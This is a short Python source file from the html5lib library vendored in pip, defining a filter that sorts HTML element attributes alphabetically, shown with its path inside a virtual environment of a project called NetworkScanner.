/NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/alphabeticalattributes.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | from . import base 4 | 5 | from collections import OrderedDict 6 | 7 | 8 | def _attr_key(attr): 9 | """Return an appropriate key for an attribute for sorting 10 | 11 | Attributes have a namespace that can be either ``None`` or a string. We 12 | can't compare the two because they're different types, so we convert 13 | ``None`` to an empty string first. 14 | 15 | """ 16 | return (attr[0][0] or ''), attr[0][1] 17 | 18 | 19 | class Filter(base.Filter): 20 | """Alphabetizes attributes for elements""" 21 | def __iter__(self): 22 | for token in base.Filter.__iter__(self): 23 | if token["type"] in ("StartTag", "EmptyTag"): 24 | attrs = OrderedDict() 25 | for name, value in sorted(token["data"].items(), 26 | key=_attr_key): 27 | attrs[name] = value 28 | token["data"] = attrs 29 | yield token 30 | --------------------------------------------------------------------------------